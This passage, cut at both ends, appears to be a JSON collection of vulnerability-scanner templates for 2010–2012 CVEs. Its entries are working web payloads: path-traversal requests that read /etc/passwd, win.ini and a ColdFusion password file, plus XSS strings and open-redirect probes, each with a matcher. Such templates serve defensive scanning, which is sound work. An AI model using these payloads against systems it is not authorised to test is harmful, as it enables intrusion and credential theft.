Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File 